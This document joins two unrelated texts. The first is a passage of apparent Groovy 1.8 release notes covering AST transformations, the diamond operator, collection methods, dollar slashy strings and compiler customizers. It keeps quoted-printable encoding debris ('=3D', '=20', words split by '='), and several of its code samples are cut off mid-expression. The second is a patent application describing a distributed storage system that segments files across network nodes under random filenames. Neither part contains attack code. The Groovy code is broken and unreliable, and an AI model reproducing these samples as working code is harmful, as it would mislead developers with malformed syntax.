{ super(msg, t) } CustomException(Throwable t) { super(t) } }=20 Simply use the @InheritConstructors transformation which takes care of o= verriding the base constructors for you:=20 import groovy.transform.* @InheritConstructors class CustomException extends Exception {}=20 Those two transformations, combined together, simplify the usage of synchronized keyword, and improve upon the @S= ynchronized transformation with a more granular locking. More concretely, with an example, the following:=20 import groovy.transform.* class ResourceProvider { private final Map<String, String> data =3D new HashMap<>() @WithReadLock String getResource(String key) { return data.get(key) } @WithWriteLock void refresh() { //reload the resources into memory } }=20 Will generate code as follows:=20 import java.util.concurrent.locks.ReentrantReadWriteLock import java.util.concurrent.locks.ReadWriteLock class ResourceProvider { private final ReadWriteLock $reentrantlock =3D new ReentrantReadWriteLo= ck() private final Map<String, String> data =3D() } } }=20 If you annotate a Collection type field with @ListenerList, it generates= everything that is needed to follow the bean event pattern. This is kind o= f an EventType independent version of what @Bindable is for PropertyChangeE= vents.=20 This example shows the most basic usage of the @ListenerList annotation.= The easiest way to use this annotation is to annotate a field of type List= and give the List a generic type. In this example we use a List of type My= Listener. MyListener is a one method interface that takes a MyEvent as a pa= rameter. The following code is some sample source code showing the simplest= scenario.=20 interface MyListener { void eventOccurred(MyEvent event) } class MyEvent { def source String message MyEvent(def source, String message) { this.source =3D source this.message =3D message } } class MyBeanClass { @ListenerList List<MyListener> listeners }=20 Groovy 1.9 will be the version which will align as much as possible with= the upcoming JDK 7, so beyond those aspects already covered in Groovy (lik= e strings in switch and others), most of those "Project Coin" pro= posals will be in 1.9, except the "diamond operator" which was ad= ded in 1.8, as explained in the following paragraph.=20 Java 7 will introduce the "diamond" operator in generics type = information, so that you can avoid the usual repetition of the parameterize= d types. Groovy decided to adopt the notation before JDK 7 is actually rele= ased. So instead of writing:=20 List<List<String>> list1 =3D new ArrayList<List<String>= ;>()=20 You can "omit" the parameterized types and just use the pointy= brackets, which now look like a diamond:=20 List<List<String>> list1 =3D new ArrayList<>()=20 def isEven =3D { it % 2 =3D=3D 0 } assert [2,4,2,1,3,5,2,4,3].count(isEven) =3D=3D 5=20 assert [0:2, 1:3] =3D=3D [1,2,3,4,5].countBy{ it % 2 } assert [(true):2, (false):4] =3D=3D 'Groovy'.toList().countBy{ it =3D=3D 'o= ' }=20 assert [10, 20].plus(1, 'a', 'b') =3D=3D [10, 'a', 'b', 20]=20 assert [1L, 2.0] as Set =3D=3D [1, 2] as Set assert [a:2, b:3] =3D=3D [a:2L, b:3.0]=20 assert [1, 2, 2, 2, 3].toSet() =3D=3D [1, 2, 3] as Set assert 'groovy'.toSet() =3D=3D ['v', 'g', 'r', 'o', 'y'] as Set=20 def map =3D [a: 1, bbb: 4, cc: 5, dddd: 2] assert map.max { it.key.size() }.key =3D=3D 'dddd' assert map.min { it.value }.value =3D=3D 1=20 withDefault. So instead of writing code l= ike below:=20 def words =3D "one two two three three three".split() def freq =3D [:] words.each { if (it in freq) freq[it] +=3D 1 else freq[it] =3D 1 }=20 def words =3D "one two two three three three".split() def freq =3D [:].withDefault { k -> 0 } words.each { freq[it] +=3D 1 }=20 Slashy strings are now multi-line:=20 def poem =3D / to be or not to be / assert poem.readLines().size() =3D=3D 4=20 This is particularly useful for multi-line regexs when using the regex f= ree-spacing comment style (though you would still need to escape slashes):<= /p>=20 // match yyyy-mm-dd from this('/') }=20 A new string notation has been introduced: the "dollar slashy"= string. This is a multi-line GString similar to the slashy string, but wit= h slightly different escaping rules. You are no longer required to escape s= lash (with a preceding backslash) but you can use '$$' to escape a '$' or '= $/' to escape a slash if needed. Here's an example of its usage:=20 def name =3D "Guillaume" def date =3D "April, 21st" def dollarSlashy =3D $/ Hello $name, today we're ${date} $ dollar-sign $$ dollar-sign \ backslash / slash $/ slash /$ println dollarSlashy=20 This form of string is typically used when you wish to embed content tha= t may naturally contains slashes or backslashes and you don't want to have = to rework the content to include all of the necessary escaping. Some exampl= es are shown below:=20 def tic =3D 'tic' def xml =3D $/ <xml> $tic\tac </xml> /$ assert "\n<xml>\ntic\\tac\n</xml>\n" =3D=3D xml=20 def dir =3D $/C:\temp\/$=20 // match yyyy-mm-dd from current('/') } assert '10-08-1989' =3D=3D '1989/08/10'.find(dateRegex) { all, y, m, d ->= ; [d, m, y].join('-') }=20 def alphabet =3D ('a'..'z').join('') def code =3D $/ def normal =3D '\b\t\n\r' def slashy =3D /\b\t\n\r/ assert '$alphabet'.size() =3D=3D 26 assert normal.size() =3D=3D 4 assert slashy.size() =3D=3D 8 /$ println code Eval.me(code)=20 The compilation of Groovy code can be configured through the Compi= lerConfiguration class, for example for setting the encoding of your= sources, the base script class, the recompilation parameters, etc). = CompilerConfiguration now has a new option for setting compilati= on customizers (belonging to the org.codehaus.groovy.control.cus= tomizers package). Those customizers allow to customize the compilat= ion process in three ways: ImportCustomizer: so you d= on't have to always add the same imports all over again SecureASTCustomizer: by allowing/disallowing certain classes, or special AST nodes (Abstra= ct Syntax Tree), filtering imports, you can secure your scripts to avoid ma= licious code or code that would go beyond the limits of what the code shoul= d be allowed to do. ASTTransformationCustomizer=: lets you apply transformations to all the class nodes of your comp= ilation unit. For example, if you want to apply the @Log transformation to all the cla= sses and scripts, you could do:=20 import org.codehaus.groovy.control.CompilerConfiguration import org.codehaus.groovy.control.customizers.* import groovy.util.logging.Log def configuration =3D new CompilerConfiguration() configuration.addCompilationCustomizers(new ASTTransformationCustomizer(Log= )) def shell =3D new GroovyShell(configuration) shell.evaluate(""" class Car { Car() { log.info 'Car constructed' } } log.info 'Constructing a car' def c =3D new Car() """)=20 This will log the two messages, the one from the script, and the one fro= m the Car class constructor, through java.util.logging. No need to apply th= e @Log transformation manually to both the script and the class: the transf= ormation is applied to all class nodes transparently. This mechanism can al= so be used for adding global transformations, just for the classes and scri= pts that you compile, instead of those global transformations being applied= to all scripts and classes globally.=20 If you want to add some default imports (single import, static import, s= tar import, star static imports, and also aliased imports and static import= s), you can use the import customizer as follows:=20 import org.codehaus.groovy.control.CompilerConfiguration import org.codehaus.groovy.control.customizers.* def configuration =3D new CompilerConfiguration() def custo =3D new ImportCustomizer() custo.addStaticStar(Math.name) configuration.addCompilationCustomizers(custo) def shell =3D new GroovyShell(configuration) shell.evaluate(""" cos PI/3 """)=20 When you want to evaluate Math expressions, you don't need anymore to us= e the import static java.lang.Math.* star static import to imp= ort all the Math constants and static functions. Given a String or a GString, you can coerce it to Enum values bearing th= e same name, as the sample below presents:=20 enum Color { red, green, blue } // coercion with as def r =3D "red" as Color // implicit coercion Color b =3D "blue" // with GStrings too def g =3D "${'green'}" as Color=20 Maps now support isCase(), so you can use maps in your swit= ch/case statements, for instance: def m =3D [a: 1, b: 2] def val =3D 'a' switch (val) { case m: "key in map"; break // equivalent to // case { val in m }: ... default: "not in map" }=20 When you need to specify a special grab resolver, for when the artifacts= you need are not stored in Maven central, you could use:=20 @GrabResolver(name =3D 'restlet.org', root =3D '') @Grab('org.restlet:org.restlet:2.0.6') import org.restlet.Restlet=20 Groovy 1.8 adds a shorter syntax as well:=20 @GrabResolver('') @Grab('org.restlet:org.restlet:2.0.6') import org.restlet.Restlet=20 The @Grab annotation has numerous options. For example, to = download the Apache commons-io library (where you wanted to set the t= ransitive and force attributes - not strictly needed fo= r this example but see the Grab or Ivy documentation for details on what th= ose attributes do) you could use a grab statement similar to below: @Grab(group=3D'commons-io', module=3D'commons-io', version=3D'2.0.1', trans= itive=3Dfalse, force=3Dtrue)=20 The compact form for grab which allows the artifact information to be re= presented as a string now supports specifying additional attributes. As an = example, the following script will download the commons-io jar and the corr= esponding javadoc jar before using one of the commons-io methods.=20 @Grab('commons-io:commons-io:2.0.1;transitive=3Dfalse;force=3Dtrue') @Grab('commons-io:commons-io:2.0.1;classifier=3Djavadoc') import static org.apache.commons.io.FileSystemUtils.* assert freeSpaceKb() > 0=20 The eachRow and rows methods in the groo= vy.sql.Sql class now support paging. Here's an example: sql.eachRow('select * from PROJECT', 2, 2) { row -> println "${row.name.padRight(10)} ($row.url)" }=20 Which will start at the second row and return a maximum of 2 rows. Here'= s an example result from a database containing numerous projects with their= URLs:=20 Grails () Griffon ()=20 When developing AST transformations, and particularly when using a visit= or to navigate the AST nodes, it is sometimes tricky to keep track of infor= mation as you visit the tree, or if a combination of transforms need to be = sharing some context. The ASTNode base class features 4 method= s to store node metadata: public Object getNodeMetaData(Object key) public void copyNodeMetaData(ASTNode other) public void setNodeMetaData(Object key, Object value) public void removeNodeMetaData(Object key) GroovyDoc uses hard-coded templates to create the JavaDoc for your Groov= y classes. Three templates are used: top-level templates, a package-level t= emplate, a class template. If you want to customize these templates, you ca= n subclass the Groovydoc Ant task and override the getDo= cTemplates(), getPackageTemplates(), and getClass= Templates() methods pointing at your own templates. Then you can use= your custom GroovyDoc Ant task in lieu of Groovy's original one.
http://docs.codehaus.org/exportword?pageId=186712643
CC-MAIN-2014-49
refinedweb
5,824
53.21
OT SPAM filtering Discussion in 'HTML' started by Jeff Thies, Jun 17, 2004. - Similar Threads Anyone know about ISP's spam filtering affecting a web site newsletter?xyZed, Apr 25, 2004, in forum: HTML - Replies: - 13 - Views: - 829 - xyZed - Apr 27, 2004 from spam import eggs, spam at runtime, how?Rene Pijlman, Dec 8, 2003, in forum: Python - Replies: - 22 - Views: - 1,033 - Fredrik Lundh - Dec 10, 2003 Why 'class spam(object)' instead of class spam(Object)' ?Sergio Correia, Sep 7, 2007, in forum: Python - Replies: - 7 - Views: - 545 - Ben Finney - Sep 18, 2007 [OT] spam filtering serviceHendrik Maryns, Oct 31, 2007, in forum: Java - Replies: - 0 - Views: - 369 - Hendrik Maryns - Oct 31, 2007 - Replies: - 3 - Views: - 709 - Lew - Mar 25, 2008 What is Anti-Spam Filter.(thunderbird spam filter)zax75, Mar 27, 2008, in forum: Java - Replies: - 1 - Views: - 1,319 - Lew - Mar 28, 2008 SPAM: Why are we getting all the spam ??David Binnie, May 22, 2009, in forum: VHDL - Replies: - 2 - Views: - 562 - Rich Webb - May 22, 2009 Re: Updated Spam List 2011 - Largest SPAM Collection Over The Net !!!clamz, Jul 15, 2011, in forum: HTML - Replies: - 8 - Views: - 1,033 - clamz - Jul 16, 2011
http://www.thecodingforums.com/threads/ot-spam-filtering.158410/
CC-MAIN-2016-36
refinedweb
198
73.1
The Case for Metrics In Jenkins At Hootsuite, we know that we run up to 3000 Jenkins jobs per weekday. On weekends, it drops all the way down to around 40 jobs (there are automated jobs that are always running). Out of those jobs, 32.02% are built on master branches; they build changes for production services. The rest are tests, scheduled jobs, GitHub pull requests, and everything else we need to keep our pipelines and services running both smoothly and reliably. We also know that Go projects account for roughly 20% of all the Jenkins jobs we build. Scala and Ruby projects each account for roughly 10%. Node projects follow at 9%. The rest use the base JNLP pod and have no specific language requirements, with the exception of a few PHP and other specialized jobs as can be seen below. We know all of this because these metrics are tracked. These tracked metrics allow us to better serve Hootsuite developers that rely on our internal platforms. They let us know which languages Jenkins needs to support, which projects are undergoing the most changes, and most importantly where our attention and maintenance is most needed. This wasn’t always the case. Pipelines of the Past Just four years ago in 2018 we didn’t have any regular metrics on our Jenkins instance. We only had irregular metrics, run once or twice for a few data points at a time. But, without anyone regularly looking at them, and no maintenance done to retain them, the data was quickly lost. If we were asked how Jenkins was performing — or even if it was meeting our needs — we didn’t have an answer. We also didn’t know if our updates and changes improved Jenkins’ performance for developers or did the opposite. Rather than metrics, work on the Jenkins instance was entirely dictated by what complaints we received at any point in time. How many development or human resources did we need? Were we spending more on servers or development time than needed? Were jobs failing due to incorrect configuration, or not starting up at all? We didn’t have any way to tell. Our goal was to be able to answer all of these questions. When we first started trying to collect meaningful data from Jenkins we started with the question we were asked most often: Are our Jenkins pipelines able to reliably deploy? At this time, we had many different pipelines all with very different deploy patterns and stages making it difficult to know where to start. Without a common deployment pattern to use we decided to instead focus on the job that saw the most developer traffic. This was much easier to identify as we could see which projects on GitHub had the highest rate of commits. And so, we were able to choose a starting project: ‘The Dashboard’ pipeline. As it happened, The Dashboard pipeline was also the pipeline we received the most complaints about. We could quickly make a big splash! Collecting metrics from The Dashboard would make it possible to show just how valuable consistent metrics would be to a large audience of developers. In the interest of making the biggest impression we could, we collected the first metrics for the Integration Test Stage of the The Dashboard pipeline. This would make the greatest impression because everytime this stage failed it sent a Slack alert to all of the developers working on the project. In fact, at this time there were many, many Slack messages sent for this stage of the pipeline. It alone accounted for the majority of complaints we received. But, just how bad was it? We were about to find out. The Dashboard is a very high-traffic project at Hootsuite. It also had the greatest number of smoke tests; and, as smoke tests often do, they failed often. Every time these tests failed they would block the entire pipeline as multiple developers tried to get their changes out. It was a huge roadblock. We knew it wasted developer time; but, we wanted to know how much. Below is an old slide from four years ago; it shows the answer to our question on how often the build failed and the general build duration. The units are in minutes. This was just the preliminary data we received; but, the picture it painted was consistent with the data we continued to receive after it was rolled out. As you can see, for every successful build of The Dashboard there would be two failures. With build times in the ‘Build Duration’ section averaging more than 60 minutes, this meant rerunning these tests were wasting hours of dev time everyday. In the data we continued to collect we learned that in the month of February four years ago, more than 290 hours were spent just rerunning tests for that single project. The Jenkins job for The Dashboard itself only succeeded 77 out of 218 times on the first run, which translates to an astonishing 65% build failure rate. At last, we had the data to prove that the Jenkins pipeline was in serious need of maintenance. After this we were able to expand our metrics gathered on Jenkins and built a better understanding around the most common issues our pipelines encountered. This realization officially began our metrics journey four years ago; and, now in present day we have made many changes and improvements to how we collect our data. These days we use Prometheus for collecting metrics and have our metrics dashboards in Grafana. We have also moved our Jenkins instance onto Kubernetes. This means the amount of meaningful metrics we collect and our ability to use the data has increased significantly. So, what do we do now? New and Improved These days we have many different metrics that we collect. This gives us a full picture of how Jenkins is performing. These metrics are collected in different ways to accommodate the different pipelines and stages that we run, ensuring that all of our pipelines can be covered. Currently, our two main sources of metrics come from the Jenkins Prometheus plugin and a Jenkins Library function we build to send metrics to a push gateway which then injects the metrics into Prometheus. The first way we collect metrics is via the Jenkins Prometheus plugin installed on our Jenkins instance. We use a forked version of the plugin so that it better meets our requirements. This is because we run our Jenkins instance on Kubernetes (using the Kubernetes plugin); and, while the prometheus plugin is great on its own, we found that due to the default naming scheme it was creating a separate metric for every kubernetes pod that was spun up. This was due to our Jenkins agent design where we have multiple different kinds of pods for the many different kinds of jobs that we build. Every pod also includes a random string in its name on creation and together this created an excessive amount of high-cardinality in our metrics. So, in our fork we removed the pod name from the metric name and instead have the pod names as labels to reduce the load as well as to match our internal metric naming conventions. These metrics are exposed on the /prometheus path where they are then exposed on port :9191 using the metrics sidecar on the Jenkins instance. The metrics can then be found by the prometheus scraper which is running as a separate kubernetes pod and exported into Prometheus. The metrics we collect using the Prometheus plugin are used to give us insight into how Jenkins itself is handling the jobs that are run. For example, the metrics we use include: - The queue time for jobs waiting to be built. This lets us know if pods for specific build types are taking an excessive amount of time to start up. This could include errors on the docker image used to create the pod on kubernetes, blocked queues due to locked jobs, and misconfigurations in the pod templates - The percentage of successful builds per pipeline. This alerts us if there are builds on Jenkins that consistently fail, or if we start seeing high rates of failure across all builds we can take action to investigate what is causing issues. - The total number of active pipeline jobs. This keeps track of any dead jobs that should either be maintained or deleted; but, also helps us identify the total amount of builds we are actively supporting - The rate of builds per hour. This lets us know during what times Jenkins is most heavily used. It gives us insight into how many resources we need to support at different times. Our second metric collection method is done using a Jenkins Shared Library function that we built in house. This function can be called in any pipeline and provides more job specific metrics to developers to track how their project is performing. It is implemented through a shared library that is used by all pipeline jobs on Jenkins and it is integrated into the default build flow of all jobs. It also supports sending custom metrics for jobs that developers want additional insight into. To collect these metrics we use both the Weaveworks prometheus aggregation gateway which we use for collecting counters and histograms built in the JSL function and the Prometheus pushgateway for collecting gauges. In the case of both of these gateways we build out metrics to match the notations data model for prometheus. This allows us to name our metric, assign any labels we want (such as job name and branch), and assign the value we want to send for the metric. These metrics are then also scraped in the same way as those sent by the prometheus plugin and are then also available in Grafana. // url (String) : URL for either the aggregating-pushgateway server // or the pushgateway server. Gauges are sent to // pushgateway, all other metrics are sent to the // aggregating-pushgateway // msg (String): The data to be sent to prometheus in notation formdef send_message(String url, String msg) { def pushGateway = new URL(url).openConnection(); pushGateway.setRequestMethod(“POST”) pushGateway.getOutputStream().write(msg.getBytes(“UTF-8”)); def postRC = pushGateway.getResponseCode(); if (!postRC.equals(200)) { println(“Unable to send metrics”) } } The metrics we collect using the Jenkins Shared Library include the duration for the different stages in a build pipeline, the success and failure rate of each of those stages, percentage of test coverage by different jobs, and how often each of our Jenkins Shared Libraries functions are called. The duration of stages tells us which areas are slowest and could benefit from caching or increased resources. The success and failure rate of stages lets us know where pipelines are most likely to fail and could use reliability improvements. Test coverage informs developers of how much confidence they can have that their deployment is stable. And, our metric for tracking how often our custom functions are called lets us know what developers are finding the most useful; or, if a function has low usage that either we have not shared it well enough with developers or it does not meet their requirements. Together these two methods of metrics collection provide both our team and developers with increased insight into how jobs are performing on Jenkins and where our time would be best spent to improve developer experience. We also have future plans to continue to improve our metrics and ensure that our data is useful. This will allow us to improve the experience developers have when interacting with a Jenkins pipeline. We also plan to revisit test metrics to investigate the value of data on not only on percentage of test failures and test coverage, but also on how often different tests for different features are run, and the percentage of different types tests (smoke, API, etc) that are run. With this data we want to build a better understanding of how testing is done at Hootsuite. The Benefits of a Well-Oiled Pipeline With these changes we have seen an increase in reliability of our running Jenkins jobs. Our new metrics system has allowed us to accurately track any issues that arise from the many pipelines that are run far more quickly than word of mouth and complaints. They not only allow us to act quickly when an incident occurs but also allow us to easily view the trends of our pipelines, often preventing incidents before they even happen. We now also use them as part of our SLOs by allowing us to promise developers that their pipelines will begin building within a certain timeframe, the reliability of different Jenkins agents that we use, and the availability of Jenkins itself. Finally, our metrics are also available on the pipelines that developers at Hootsuite manage themselves. This allows them to have better insight into their own code bases and the reliability of their own projects that are run on Jenkins. Back to the example of The Dashboard project, there is now a dedicated team maintaining and improving the pipeline and its related services. It is in a much better state than it was before. Just look at our new metrics for the proof. Not only are builds passing with a success rate of 95% instead of 50%, but we also now have metrics on the Dashboard specific tests.
https://medium.com/hootsuite-engineering/the-case-for-metrics-in-jenkins-b49bf05c0d15?source=collection_home---6------1-----------------------
CC-MAIN-2021-49
refinedweb
2,233
67.89
US20090222509A1 - System and Method for Sharing Storage Devices over a Network - Google PatentsSystem and Method for Sharing Storage Devices over a Network Download PDF Info - Publication number - US20090222509A1US20090222509A1 US12040561 US4056108A US20090222509A1 US 20090222509 A1 US20090222509 A1 US 20090222509A1 US 12040561 US12040561 US 12040561 US 4056108 A US4056108 A US 4056108A US 20090222509 A1 US20090222509 A1 US 20090222509A1 - Authority - US - Grant status - Application - Patent type - - Prior art keywords - data - ddss - client - file - node - Abstract A distributed data sharing system provides storage areas for network clients. Files are written in such a manner that user data is protected and/or so that the network can make use of any available space at a network when saving files. Description - [0001]1. Field of the Invention - [0002]This invention relates to sharing resources over a network and, in particular, sharing storage space among network nodes. - [0003]2. Description of the State of the Art and Background - [0004]The term “file system” refers to the system designed to provide computer application programs with access to data stored on storage devices in a logical, coherent way. A file system may be understood as a set of abstract data types that are implemented for the storage, hierarchical organization, manipulation, navigation, access, and retrieval of data. File systems hide the details of how data is stored on storage devices. For instance, storage devices are generally block addressable, in that data is addressed with the smallest granularity of one block; multiple, contiguous blocks form an extent. The size of the particular block, typically 512 bytes in length, depends upon the actual devices involved. Application programs generally request data from file systems byte by byte. Consequently, file systems are responsible for seamlessly mapping between application program address-space and storage device address-space. File systems store volumes of data on storage devices. The term “volume” refers to the collection of data blocks for one complete file system instance. These storage devices may be partitions of single physical devices or logical collections of several physical devices. Computers may have access to multiple file system volumes stored on one or more storage devices. - [0005]An operating system may be understood as the software that manages the sharing of the resources of a computer and provides programmers and users also forms a platform for other system software and for application software. This platform is usually provided in the form of an Application Program Interface (“API”). - [0006]Most current operating systems are capable of using the TCP/IP networking protocols. This means that computers running dissimilar operating systems can participate in a common network for sharing resources such as computing, files, printers, and scanners using either wired or wireless connections. - [0007]Files are presented to application programs through directory files that form a tree-like hierarchy of files and subdirectories containing more files. Application programs identify files by pathnames comprised of the filename and the names of all encompassing directories. The complete directory structure is called the file system namespace. For each file, file systems maintain attributes such as ownership information, access privileges, access times, and modification times. A “filename” is intended to mean the logical name assigned for the collection of data associated with the file, as understood by a user and mapped to physical, or non-volatile memory by the file system. A logical filename may be referred to as the unique name for the file in a file system's directory, or the concatenation of a logical filename and a logical pathname. - [0008]The terms real-data and metadata classify application (or user) data and information pertaining to file system structure data, respectively. Real-data may be understood as the data that application programs or users store in regular files. Conversely, file systems create metadata to store volume layout information, such as inodes, pointer blocks, and allocation tables. Metadata is not directly visible to applications. Metadata can sometimes provide extensive information about who, what, where and when about a file. Metadata may also be stored with the real data by an application, such as the metadata stored with the real data in a Microsoft Word® document. - [0009]Some file systems maintain information in what are called File Allocation Tables (“FATs”), which indicate the data blocks assigned to files and the data blocks available for allocation to files. A FAT is a table that an operating system maintains on a hard disk that provides a map of the clusters (the basic units of logical storage on a hard disk) that a file has been stored. FATs are maintained in the Microsoft Windows® operating systems. - [0010]Distributed file systems provide users and application programs with transparent access to files from multiple computers networked together. Architectures for distributed file systems fall into two main categories: network attached storage (NAS)-based and storage area network (SAN)-based. NAS-based file sharing, also known as “shared nothing”, places server computers between storage devices and client computers connected via LANs. In contrast, SAN-based file sharing, traditionally known as “shared disk” or “share storage”, uses SANs to directly transfer data between storage devices and networked computers. - [0011]I/O interfaces or devices transport data among computers and storage devices. Traditionally, interfaces fall into two categories: channels and networks. Computers generally communicate with storage devices via channel interfaces. Channels typically span short distances and provide low connectivity. Performance requirements often dictate that hardware mechanisms control channel operations. The Small Computer System Interface (SCSI) is a common channel interfaces. Storage devices that are connected directly to computers are known as direct-attached storage (DAS) devices. - [0012]Computers communicate with other computers through networks. Networks are interfaces with more flexibility than channels. Local area networks (LAN) connect computers medium distances, such as within buildings, whereas wide area networks (WAN) span long distances, like across campuses or even across the world. LANs normally consist of shared media networks, like Ethernet, while WANs are often point-to-point connections, like Asynchronous Transfer Mode (ATM). Transmission Control Protocol/Internet Protocol (TCP/IP) is a popular network protocol for both LANs and WANs. - [0013]Recent interface trends combine channel and network technologies into single interfaces capable of supporting multiple protocols. For instance, Fibre Channel (FC) is a serial interface that supports network protocols like TCP/IP as well as channel protocols such as SCSI-3. Other technologies, such as iSCSI, map the SCSI storage protocol onto TCP/IP network protocols, thus utilizing LAN infrastructures for storage transfers. - [0014]The network interface(s) between a computer, DAS storage, network storage or server and the rest of the network is sometimes referred to as a node. A node may also correspond to a network communication device, such as a network switch. - [0015]Network architecture is often times understood by reference to a network topology. A topology refers to the specific physical, i.e., real, or logical, i.e., virtual, arrangement of the elements of a network. Two networks may have the same topology if the connection configuration is the same, although the networks may differ in physical interconnections, distances between nodes, transmission rates, and/or protocol types. The common types of network topologies are the bus (or linear) topology, fully connected topology, mesh topology, ring topology, star topology, and tree topology. Networks may also be characterized as de-centralized, such as a linear topology or a peer-to-peer network in which each node manages its own communications and data sharing directly with another node, or a centralized topology such as a star topology. A combination of different topologies are sometimes called a hybrid topology. - [0016]A bus topology is a network in which all nodes are connected together by a single bus. A fully connected topology is a network topology in which there is a direct path between any two nodes. A mesh topology is one in which there are at least two nodes with two or more paths between them. A ring topology is a topology in which every node has exactly two branches connected to it. A star topology is a. A tree topology, from a purely topologic viewpoint, resembles an interconnection of star networks in that individual peripheral nodes are required to transmit to and receive from one other node only, toward a central node, and are not required to act as repeaters or regenerators. The function of the central node may be distributed. As in the conventional star network, individual nodes may thus still be isolated from the network by a single-point failure of a transmission path to the node. - [0017]The invention is directed to embodiments of a Distributed Data Storage System or DDSS. A DDSS may allow one or more clients of a network to more fully utilize storage space available over a network and/or store data while maintaining an adequate level privacy/security for sensitive information contained within the data. - [0018]In one embodiment there. This method includes the steps of the client accessing storage space at the server node after the server recognizes the client as a client of the server, and writing a first data segment of the file to node A and a second data segment of the file to node B. - [0019]The writing step includes the steps choosing node A and node B for storage of the first and second data segments, respectively, generating a segment A filename for the first data segment and a segment B filename for the second data segment, and writing Segment A to node A and Segment B to node B. After writing segment A and B, the server saves a map that enables the re-assembly of the file from the first and second data segments. - [0020]The map may be meta data including records of filenames and nodes where the associated files may be found, the identity of the owner of the original file, the network address for the owner, the information needed to re-assemble the files from the file segments. The file segments may also be written by a user-selectable degree of redundancy. Each segment may be redundantly stored at network nodes so that if a node become unavailable, a redundant copy is available. The meta data may then include both data segment information and redundant data segment information in the event the redundancies are needed to recover the file. - [0021]In one embodiment, the client may read and write data independent of the server. According to this embodiment, the client performs a read and write as it normally would, and regardless of the presence of the server node. The server is called upon only to retrieve the logical filenames and their locations, and the mapping between the plurality of data segments and the ordering of these segments in the original file. - [0022]The filenames may be randomly generated filenames. As such, the presence of two data segments of a file in a directory, among other files with randomly generated filenames, would not be apparent to one viewing the directory contents. That is, one could not recognize that the two segments were taken from the same file. The two data segments, if located adjacent to each other according to an application's mapping of the data in the file, are preferably not written to the same node. This will make it more difficult to discern a relationship between the two data segments. - [0023]The nodes where data segments are written may be determined by the server node and recommended to the client. The server may select nodes based on at least one of the following criteria: the level of network traffic at a node, the number of packet errors per transmission to/from a node, the type of storage medium at the node, and the type of communication link(s) between the client node and Storage device(s). The server may recommend nodes to a client by a assigning a node score for each node. The client may then select the nodes that exceed a threshold node score. - [0024]The server may provide the information on the available nodes and the filenames for storing segments. In other embodiments, a client side module may provide one or both of these functions, in which case the server may only serve as a secure databank and client account manager for the DDSS. The client may select the number of segments independent of the status of nodes, and then write segments to nodes based on their availability only. The client may also generate the filenames and match those filenames to nodes. Under these embodiments, the client module would utilize a random generation of filenames routine and node selection routine. The meta data would only be stored in virtual memory, and after a successful write the information would be sent to the server for storage and then erased at the client node. - [0025]The map file, or the DDSS meta data may be located only at the server and stored so that only the owner of the file has access to the information. The map file may be stored in a password protected storage at the server, or encrypted at a site accessible to other nodes on the network. - [0026]The client node may be configurable for separate communication links with a plurality of nodes, including at least the server node, and nodes A and B. A method according to one embodiment may further include the steps of the client requesting from the server the available nodes for data storage and then receiving from the server the availability of the plurality of nodes, the client segmenting the file into Segments A and B based on the availability of nodes A and B, and the client writing Segments A and B to the respective nodes A and B, and a copy of the Segment A to a different one of the available plurality of nodes. An application resident at the client node may request the file, which may be retrieved by accessing segments and one or more redundant copies of segments until the file can be fully re-assembled and passed to the application. - [0027]In another embodiment, a file storing method for storing a file over a network having a plurality of storage devices at network nodes, the file containing real data, includes the steps of partitioning the real data into a plurality of real data segments, generating a random filename for each one of the real data segments, associating each of the real data segments with its respective randomly generated filename, and storing each of the real data segments on one of the plurality of storage devices. The storing step may include storing the metadata needed to reconstruct the file from the data segments at a restricted node on the network, which is accessible to only the owner of the file. Further, the real data segments may be partitioned from the file according to a sequential order according to their relative byte locations in the file, and the real data segments are stored on one or more of the plurality of nodes in one of a random, intermittent or non-sequential order. A sequential ordering of the bytes can be the order in which an application orders the information in the file. - [0028]A DDSS may be implemented on any network topology and storage areas that can be accessed over a network. DAS or network storage can be included as DDSS storage areas. In another embodiment, a computer network includes a a second communication link between the client and the server such that the client is enabled for accessing the information needed to re-assemble the file when the client wishes to re-assemble the file from the data segments. - [0029]A computer network may include a plurality of redundant nodes storing redundant data segments. In a method for a computer to access data associated with a user's file, the data being stored as a plurality of data segments distributed over a network having nodes, and as a plurality of copies of the data segments over the nodes, includes the steps of the computer requesting from a network node the locations of the data segments and copies of data segments, and the computer accessing a node in order to retrieve a data segment. If the data segment at the node is inaccessible, then the computer attempts to access a different node where a redundancy of the segment is stored. This process is repeated until a copy of the segment is accessible to the computer. - [0030]In some embodiments a DDSS is run by application programs that are loaded and run over a local operating system, and perform read/write information based on filesystems managed by the local operating system. The application may include a DDSS server module. DDSS clients may be added by downloading a client module from the server. - [0031]In another embodiment, software residing on a storage medium and adapted for providing server-like functions includes a fourth portion for limiting access to the map file to only the owner of the source file. - [0032]In another embodiment, software residing on a storage medium and adapted for providing client-like functions includes a fifth portion for gaining access to a map file on a network node, the map file containing a previously communicated relationship between filenames and the nodes where the data portions reside, and the relationship between the data portions and the data as it existed in the source file. - [0033]According to some embodiments, after a write attempt is detected or a write request is sent to the server, a server module and a client module together perform a DDSS write process. This process includes transferring the real data in a file to the DDSS storage space assigned to the client. The real data is segmented and stored in different files called file segments. After the real data the file are located, and the order in which the file is re-assembled from the file segments. This DDSS meta data is stored in physical memory only at the DDSS server, which is password protected. - [0034]In some embodiments, a network includes a plurality of DDSS nodes for storage and a plurality DDSS clients. Some of the nodes may also be clients. The plurality of DDSS clients and nodes may access their respective DDSS meta data at a primary server. The primary server includes a password-protected site for the meta data associated with each of the clients' files. The meta data contains the information about the clients' files necessary for re-assembling the files from file segments. Alternatively, meta data for each clients' files may be stored in an encrypted file that is read into a client's or the server's cached memory when a client initiates a DDSS session. The primary server includes software for maintaining client accounts. In the event that the primary server becomes unavailable, one or more secondary servers can be called and serve in place of the primary server. The secondary servers can be local servers designated to manage only a subset of clients. - [0035]A DDSS may be implemented within a peer-to-peer or server-less network environment, as well as within a centralized network environment. In some embodiments, a DDSS server and client(s) may be configured by installing and running respective server and client applications on a designated server that interfaces with an operating system's application program interface (“API”). In these embodiments, the DDSS can be initiated or terminated like other programs, and have access to system resources through the API like any other application program. - [0036]Preferably, file segment information is only viewable by someone with administrative rights at the DDSS server. Thus, no user at a client node may see where its file information is stored, and the client module only has temporary access to this information. Thus, even user's interacting with DDSS clients have no way of seeing where the actual files were stored, the filenames used, the partitioning of data, etc. Information for accessing the actual files and locations are kept in nonvolatile memory only at the DDSS server. The DDSS client is provided with the mapping information it needs only when a valid read/write request is made, but the information necessary to make system calls through the DDSS client operating system, or network server operating system, is only maintained in temporary memory. In this way, file locations are only known at the DDSS server. After a successful read/write is made, information pertinent to the read/write is reported back to the DDSS server and then removed from memory at the DDSS client. Thereafter, the same 